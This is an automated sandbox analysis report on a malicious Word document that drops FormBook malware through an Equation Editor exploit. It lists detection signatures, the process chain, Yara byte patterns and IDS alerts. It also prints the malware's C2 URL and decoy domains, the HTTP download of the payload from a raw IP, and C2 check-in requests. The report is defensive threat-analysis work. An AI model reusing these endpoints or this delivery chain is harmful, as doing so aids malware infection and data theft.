Analysis Report dot.dot

Overview

General Information

Sample Name:dot.dot
Analysis ID:383958
MD5:40f03856876fda8b3bda880d1d5a4636
SHA1:d252c054154c5524dfbf3f3238b32f711290fd36
SHA256:a4358b898c41852211ee727e4b8c0d05301bf4c6a90a4780c5a6f8b1b1cf5c81
Tags:Formbook
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: File Dropped By EQNEDT32EXE
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Drops PE files to the user root directory
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Office equation editor drops PE file
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Drops PE files to the user directory
Enables debug privileges
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
PE file contains sections with non-standard names
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Sample execution stops while process was sleeping (likely an evasion)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w7x64
  • WINWORD.EXE (PID: 648 cmdline: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding MD5: 95C38D04597050285A18F66039EDB456)
  • EQNEDT32.EXE (PID: 2504 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • vbc.exe (PID: 2616 cmdline: 'C:\Users\Public\vbc.exe' MD5: 29E8627D7B80C21FC98C82314F3DF5E2)
      • vbc.exe (PID: 2564 cmdline: 'C:\Users\Public\vbc.exe' MD5: 29E8627D7B80C21FC98C82314F3DF5E2)
        • explorer.exe (PID: 1388 cmdline: MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
          • NAPSTAT.EXE (PID: 2820 cmdline: C:\Windows\SysWOW64\NAPSTAT.EXE MD5: 4AF92E1821D96E4178732FC04D8FD69C)
            • cmd.exe (PID: 2700 cmdline: /c del 'C:\Users\Public\vbc.exe' MD5: AD7B9C14083B52BC532FBA5948342B98)
  • EQNEDT32.EXE (PID: 2936 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.scott-re.online/nnmd/"], "decoy": ["bongwater.life", "regalparkllc.com", "gyanankuram.com", "quehaydecenarhoy.com", "israeldigitalblog.net", "gatewaygaurdians.com", "krphp.com", "domentemenegi47.com", "fjsibao.com", "yetbor.com", "goldenvalueable.com", "finalexam-thegame.com", "buyeverythingforbaby.com", "phillydroneservices.com", "xn--kck4cd0r.net", "suns-brothers.com", "xn--80aaxkmix.xn--p1acf", "pjsgsc.com", "7985699.com", "blackmantech.fitness", "acernoxsas.com", "verochfotografa.com", "az-pcp.com", "clonegrandma.com", "elpis-catering.com", "gujaratmba.com", "samanthataylordesigns.com", "sinisviaggi.com", "likehowto.com", "ueoxx.com", "americanscreentest.com", "taniakarina.com", "nevomo.group", "syduit.com", "elticrecruit.com", "xn--v1bmo9dufsb.com", "valid8.network", "vt999app.net", "privateselights.com", "xpddwrfj.icu", "mex33.info", "ekolucky.com", "v6b9.com", "winnijermaynezigmund.site", "papofabri.com", "ranguanglian.club", "vinegret.com", "sorelaxedmassage.com", "vr-club.site", "raison-sociale.com", "partapprintercare.com", "dream-e-mail.com", "cwcellar.com", "vegrebel.com", "my-weight-loss-blog.net", "hcr.services", "topmejoresproductos.com", "foodates.com", "l2zmamzoin.xyz", "nevertraveled.com", "ikoyisland.net", "lawsoftwareteam.com", "ufa2345.com", "thechilldrengang.com"]}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000005.00000002.2117770021.0000000000400000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
    00000005.00000002.2117770021.0000000000400000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
    • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000005.00000002.2117770021.0000000000400000.00000040.00000001.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
    • 0x166b9:$sqlite3step: 68 34 1C 7B E1
    • 0x167cc:$sqlite3step: 68 34 1C 7B E1
    • 0x166e8:$sqlite3text: 68 38 2A 90 C5
    • 0x1680d:$sqlite3text: 68 38 2A 90 C5
    • 0x166fb:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16823:$sqlite3blob: 68 53 D8 7F 8C
    00000007.00000002.2376582663.0000000000080000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
      00000007.00000002.2376582663.0000000000080000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
      • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

      Unpacked PEs

      Source | Rule | Description | Author | Strings
      5.2.vbc.exe.400000.0.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
        5.2.vbc.exe.400000.0.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
        • 0x77e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x7b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x13895:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x13381:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x13997:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x13b0f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x859a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x125fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0x9312:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x18987:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x19a2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        5.2.vbc.exe.400000.0.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
        • 0x158b9:$sqlite3step: 68 34 1C 7B E1
        • 0x159cc:$sqlite3step: 68 34 1C 7B E1
        • 0x158e8:$sqlite3text: 68 38 2A 90 C5
        • 0x15a0d:$sqlite3text: 68 38 2A 90 C5
        • 0x158fb:$sqlite3blob: 68 53 D8 7F 8C
        • 0x15a23:$sqlite3blob: 68 53 D8 7F 8C
        5.1.vbc.exe.400000.0.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
          5.1.vbc.exe.400000.0.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
          • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

          Sigma Overview

          System Summary:

          Sigma detected: File Dropped By EQNEDT32EXE
          Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2504, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe

          Signature Overview

          AV Detection:

          Antivirus detection for URL or domain
          Source: www.scott-re.online/nnmd/Avira URL Cloud: Label: malware
          Found malware configuration
          Source: 00000005.00000002.2117770021.0000000000400000.00000040.00000001.sdmpMalware Configuration Extractor: FormBook
          Multi AV Scanner detection for dropped file
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exeReversingLabs: Detection: 41%
          Source: C:\Users\Public\vbc.exeReversingLabs: Detection: 41%
          Multi AV Scanner detection for submitted file
          Source: dot.dotVirustotal: Detection: 43%
          Source: dot.dotReversingLabs: Detection: 33%
          Yara detected FormBook
          Source: Yara matchFile source: 00000005.00000002.2117770021.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2376582663.0000000000080000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2376887110.0000000000220000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2117886001.00000000006F0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000001.2085577437.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2117786031.0000000000430000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.2085703168.0000000000220000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2376829396.00000000001B0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.1.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.1.vbc.exe.400000.0.unpack, type: UNPACKEDPE
          Machine Learning detection for dropped file
          Source: C:\Users\Public\vbc.exeJoe Sandbox ML: detected
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exeJoe Sandbox ML: detected
          Source: 5.2.vbc.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 5.1.vbc.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen

          Exploits:

          Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe
          Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
          Source: Binary string: wntdll.pdb source: vbc.exe, NAPSTAT.EXE
          Source: Binary string: napstat.pdb source: vbc.exe, 00000005.00000003.2117075823.000000000050C000.00000004.00000001.sdmp
          Source: global trafficDNS query: name: www.likehowto.com
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 23.95.122.24:80

          Networking:

          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49169 -> 45.142.156.44:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49169 -> 45.142.156.44:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49169 -> 45.142.156.44:80
          C2 URLs / IPs found in malware configuration
          Source: Malware configuration extractorURLs: www.scott-re.online/nnmd/
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 08 Apr 2021 11:09:09 GMTServer: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27Last-Modified: Thu, 08 Apr 2021 04:59:44 GMTETag: "5e800-5bf6eea6ef000"Accept-Ranges: bytesContent-Length: 387072Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownload
          Source: global trafficHTTP traffic detected: GET /nnmd/?RzuD=vRs6n4JW3em4syOJV7b+YJv/yKqWGc/3Y/UBZKRypASveBlD9HGJWlgQmcmxQu52M4L1eA==&-Zz=NpM4AjBPzV5hSni0 HTTP/1.1Host: www.likehowto.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /nnmd/?RzuD=5eMcWOIW8Rc4h8QDZH6T6n9ePY1bhRzkU2oAA9D0h2F0eFvVxskwV1Msq4lSZpkiXepntw==&-Zz=NpM4AjBPzV5hSni0 HTTP/1.1Host: www.7985699.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 45.142.156.44 45.142.156.44
          Source: Joe Sandbox ViewASN Name: CNSERVERSUS CNSERVERSUS
          Source: Joe Sandbox ViewASN Name: HENGTONG-IDC-LLCUS HENGTONG-IDC-LLCUS
          Source: global trafficHTTP traffic detected: GET /zyo/vbc.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 23.95.122.24Connection: Keep-Alive
          Source: unknownTCP traffic detected without corresponding DNS query: 23.95.122.24
          Source: C:\Windows\explorer.exeCode function: 6_2_02956302 getaddrinfo,setsockopt,recv,6_2_02956302
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{555C4A64-8E09-401E-A760-1A1C7B299BE3}.tmp
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: <FavoriteIcon>http://www.facebook.com/favicon.ico</FavoriteIcon> equals www.facebook.com (Facebook)
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: <FavoriteIcon>http://www.myspace.com/favicon.ico</FavoriteIcon> equals www.myspace.com (Myspace)
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: <FavoriteIcon>http://www.rambler.ru/favicon.ico</FavoriteIcon> equals www.rambler.ru (Rambler)
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: <URL>http://www.facebook.com/</URL> equals www.facebook.com (Facebook)
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: <URL>http://www.rambler.ru/</URL> equals www.rambler.ru (Rambler)
          Source: explorer.exe, 00000006.00000000.2094304052.0000000003C40000.00000002.00000001.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
          Source: unknownDNS traffic detected: queries for: www.likehowto.com
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 08 Apr 2021 10:59:29 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://cgi.search.biglobe.ne.jp/
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://cgi.search.biglobe.ne.jp/favicon.ico
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://clients5.google.com/complete/search?hl=
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://cnet.search.com/
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://cnweb.search.live.com/results.aspx?q=
          Source: explorer.exe, 00000006.00000000.2095285782.0000000004B50000.00000002.00000001.sdmpString found in binary or memory: http://computername/printers/printername/.printer
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://corp.naukri.com/
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://corp.naukri.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://de.search.yahoo.com/
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://es.ask.com/
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://es.search.yahoo.com/
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://esearch.rakuten.co.jp/
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://espanol.search.yahoo.com/
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://espn.go.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://find.joins.com/
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://fr.search.yahoo.com/
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://google.pchome.com.tw/
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://home.altervista.org/
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://home.altervista.org/favicon.ico
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ie.search.yahoo.com/os?command=
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ie8.ebay.com/open-search/output-xml.php?q=
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://image.excite.co.jp/jp/favicon/lep.ico
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://images.joins.com/ui_c/fvc_joins.ico
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://images.monster.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://img.atlas.cz/favicon.ico
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://img.shopzilla.com/shopzilla/shopzilla.ico
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://in.search.yahoo.com/
          Source: explorer.exe, 00000006.00000000.2094304052.0000000003C40000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com
          Source: explorer.exe, 00000006.00000000.2094304052.0000000003C40000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com/
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://it.search.dada.net/
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://it.search.dada.net/favicon.ico
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://it.search.yahoo.com/
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://jobsearch.monster.com/
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://kr.search.yahoo.com/
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://list.taobao.com/
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://list.taobao.com/browse/search_visual.htm?n=15&amp;q=
          Source: explorer.exe, 00000006.00000000.2094502203.0000000003E27000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XML.asp
          Source: explorer.exe, 00000006.00000000.2094502203.0000000003E27000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://mail.live.com/
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://mail.live.com/?rru=compose%3Fsubject%3D
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://msk.afisha.ru/
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ocnsearch.goo.ne.jp/
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://openimage.interpark.com/interpark.ico
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://p.zhongsou.com/
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://p.zhongsou.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://price.ru/
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://price.ru/favicon.ico
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://recherche.linternaute.com/
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://recherche.tf1.fr/
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://recherche.tf1.fr/favicon.ico
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://rover.ebay.com
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ru.search.yahoo.com
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://sads.myspace.com/
          Source: explorer.exe, 00000006.00000002.2377357906.0000000001C70000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search-dyn.tiscali.it/
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.about.com/
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.alice.it/
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.alice.it/favicon.ico
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.aol.co.uk/
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.aol.com/
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.aol.in/
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.atlas.cz/
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.auction.co.kr/
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.auone.jp/
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.books.com.tw/
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.books.com.tw/favicon.ico
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.centrum.cz/
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.centrum.cz/favicon.ico
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.chol.com/
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.chol.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.cn.yahoo.com/
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.daum.net/
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.daum.net/favicon.ico
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.dreamwiz.com/
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.dreamwiz.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.co.uk/
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.com/
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.de/
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.es/
